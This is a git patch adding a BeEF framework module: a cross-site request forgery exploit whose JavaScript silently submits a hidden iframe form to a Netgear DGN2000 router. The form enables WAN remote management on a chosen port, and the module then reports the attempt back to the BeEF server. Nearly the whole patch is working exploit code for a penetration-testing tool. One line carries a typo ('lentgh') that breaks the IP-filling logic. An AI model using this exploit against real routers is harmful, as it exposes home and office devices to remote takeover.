From ab0c0278c6f5d21bf52cd190b0bb862340a668f9 Mon Sep 17 00:00:00 2001 From: Nicholas Starke Date: Sat, 25 Feb 2017 09:52:22 -0600 Subject: [PATCH] Adding Netgear DGN2000 WAN Remote Management CSRF Module --- .../command.js | 103 ++++++++++++++++++ .../config.yaml | 15 +++ .../netgear_dgn2000_wan_remote_mgmt/module.rb | 20 ++++ 3 files changed, 138 insertions(+) create mode 100644 modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/command.js create mode 100644 modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/config.yaml create mode 100644 modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/module.rb diff --git a/modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/command.js b/modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/command.js new file mode 100644 index 000000000..ba84a76ba --- /dev/null +++ b/modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/command.js @@ -0,0 +1,103 @@ +// +// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var base = '<%= @base %>'; + var sourceip = '<%= @sourceip %>'; + var port = '<%= @port %>'; + var acl = sourceip != '0.0.0.0' ? 'ip_address_list1' : 'all'; + var parts = []; + if (sourceip != '0.0.0.0'){ + parts = sourceip.split('.'); + } + + var netgear_iframe = beef.dom.createIframeXsrfForm(base, 'POST', 'application/x-www-form-urlencoded', [ + { type: 'hidden', name: 'remote_mg', value: 'remote_mg' }, + { type: 'hidden', name: 'rm_ip1', value: '' }, + { type: 'hidden', name: 'rm_ip2', value: '' }, + { type: 'hidden', name: 'rm_ip3', value: '' }, + { type: 'hidden', name: 'rm_ip4', value: '' }, + { type: 'hidden', name: 'rm_start_ip1', value: '' }, + { type: 'hidden', name: 'rm_start_ip2', value: '' }, + { type: 'hidden', name: 'rm_start_ip3', value: '' }, + { type: 'hidden', name: 'rm_start_ip4', value: '' }, + { type: 'hidden', name: 'rm_finish_ip1', value: '' }, + { type: 'hidden', name: 'rm_finish_ip2', value: '' }, + { type: 'hidden', name: 'rm_finish_ip3', value: '' }, + { type: 'hidden', name: 'rm_finish_ip4', value: '' }, + { type: 'hidden', name: 'rm_list1_ip1_ip1', value: parts.length === 4 ? parts[0] : '' }, + { type: 'hidden', name: 'rm_list1_ip1_ip2', value: parts.length === 4 ? parts[1] : '' }, + { type: 'hidden', name: 'rm_list1_ip1_ip3', value: parts.lentgh === 4 ? parts[2] : '' }, + { type: 'hidden', name: 'rm_list1_ip1_ip4', value: parts.length === 4 ? parts[3] : '' }, + { type: 'hidden', name: 'rm_list1_ip2_ip1', value: '' }, + { type: 'hidden', name: 'rm_list1_ip2_ip2', value: '' }, + { type: 'hidden', name: 'rm_list1_ip2_ip3', value: '' }, + { type: 'hidden', name: 'rm_list1_ip2_ip4', value: '' }, + { type: 'hidden', name: 'rm_list1_ip3_ip1', value: '' }, + { type: 'hidden', name: 'rm_list1_ip3_ip2', value: '' }, + { type: 'hidden', name: 'rm_list1_ip3_ip3', value: '' }, + { type: 'hidden', name: 'rm_list1_ip3_ip4', value: '' }, + { type: 'hidden', name: 'rm_list1_ip4_ip1', value: '' }, + { type: 'hidden', name: 'rm_list1_ip4_ip2', value: '' }, + { type: 'hidden', name: 'rm_list1_ip4_ip3', value: '' }, + { type: 'hidden', name: 'rm_list1_ip4_ip4', value: '' }, + { type: 'hidden', name: 'rm_list1_ip5_ip1', value: '' }, + { type: 'hidden', name: 'rm_list1_ip5_ip2', value: '' }, + { type: 'hidden', name: 'rm_list1_ip5_ip3', value: '' }, + { type: 'hidden', name: 'rm_list1_ip5_ip4', value: '' }, + { type: 'hidden', name: 'rm_list1_ip6_ip1', value: '' }, + { type: 'hidden', name: 'rm_list1_ip6_ip2', value: '' }, + { type: 'hidden', name: 'rm_list1_ip6_ip3', value: '' }, + { type: 'hidden', name: 'rm_list1_ip6_ip4', value: '' }, + { type: 'hidden', name: 'rm_list1_ip7_ip1', value: '' }, + { type: 'hidden', name: 'rm_list1_ip7_ip2', value: '' }, + { type: 'hidden', name: 'rm_list1_ip7_ip3', value: '' }, + { type: 'hidden', name: 'rm_list1_ip7_ip4', value: '' }, + { type: 'hidden', name: 'rm_list1_ip8_ip1', value: '' }, + { type: 'hidden', name: 'rm_list1_ip8_ip2', value: '' }, + { type: 'hidden', name: 'rm_list1_ip8_ip3', value: '' }, + { type: 'hidden', name: 'rm_list1_ip8_ip4', value: '' }, + { type: 'hidden', name: 'rm_list1_ip9_ip1', value: '' }, + { type: 'hidden', name: 'rm_list1_ip9_ip2', value: '' }, + { type: 'hidden', name: 'rm_list1_ip9_ip3', value: '' }, + { type: 'hidden', name: 'rm_list1_ip9_ip4', value: '' }, + { type: 'hidden', name: 'rm_list1_ip10_ip1', value: '' }, + { type: 'hidden', name: 'rm_list1_ip10_ip2', value: '' }, + { type: 'hidden', name: 'rm_list1_ip10_ip3', value: '' }, + { type: 'hidden', name: 'rm_list1_ip10_ip4', value: '' }, + { type: 'hidden', name: 'rm_access', value: acl }, + { type: 'hidden', name: 'remote_port', value: port }, + { type: 'hidden', name: 'apply', value: 'Apply' }, + { type: 'hidden', name: 'todo', value: 'save' }, + { type: 'hidden', name: 'this_file', value: 'remotemg.htm' }, + { type: 'hidden', name: 'next_file', value: 'remotemg.htm' }, + { type: 'hidden', name: 'c4_rm_ip', value: '' }, + { type: 'hidden', name: 'c4_rm_start_ip', value: '' }, + { type: 'hidden', name: 'c4_rm_finish_ip', value: '' }, + { type: 'hidden', name: 'c4_rm_list1_ip1_ip', value: sourceip }, + { type: 'hidden', name: 'c4_rm_list1_ip2_ip', value: '' }, + { type: 'hidden', name: 'c4_rm_list1_ip3_ip', value: '' }, + { type: 'hidden', name: 'c4_rm_list1_ip4_ip', value: '' }, + { type: 'hidden', name: 'c4_rm_list1_ip5_ip', value: '' }, + { type: 'hidden', name: 'c4_rm_list1_ip6_ip', value: '' }, + { type: 'hidden', name: 'c4_rm_list1_ip7_ip', value: '' }, + { type: 'hidden', name: 'c4_rm_list1_ip8_ip', value: '' }, + { type: 'hidden', name: 'c4_rm_list1_ip9_ip', value: '' }, + { type: 'hidden', name: 'c4_rm_list1_ip10_ip', value: '' }, + { type: 'hidden', name: 'h_remote_mg', value: 'enable' }, + { type: 'hidden', name: 'h_rm_access', value: acl } + ]); + + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=exploit attempted'); + + cleanup = function() { + document.body.removeChild(netgear_iframe); + } + + setTimeout('cleanup()', 15000); + +}); + diff --git a/modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/config.yaml b/modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/config.yaml new file mode 100644 index 000000000..02e36e7f7 --- /dev/null +++ b/modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + Netgear_dgn_2000_wan_mgmt_csrf: + enable: true + category: [ "Exploits", "Router" ] + name: "Netgear DGN 2000 WAN Remote Management" + description: "Attempts to enable remote management of the router on the WAN" + authors: ["Nick Starke"] + target: + working: ["ALL"] diff --git a/modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/module.rb b/modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/module.rb new file mode 100644 index 000000000..552595e12 --- /dev/null +++ b/modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/module.rb @@ -0,0 +1,20 @@ +# +# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Netgear_dgn_2000_wan_mgmt_csrf < BeEF::Core::Command + + def self.options + return [ + { 'name' => 'base', 'ui_label' => 'Router URL', 'value' => 'http://192.168.0.1'}, + { 'name' => 'port', 'ui_label' => 'Port', 'value' => 8080}, + { 'name' => 'sourceip', 'ui_label' => 'Source IP', 'value' => '0.0.0.0'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end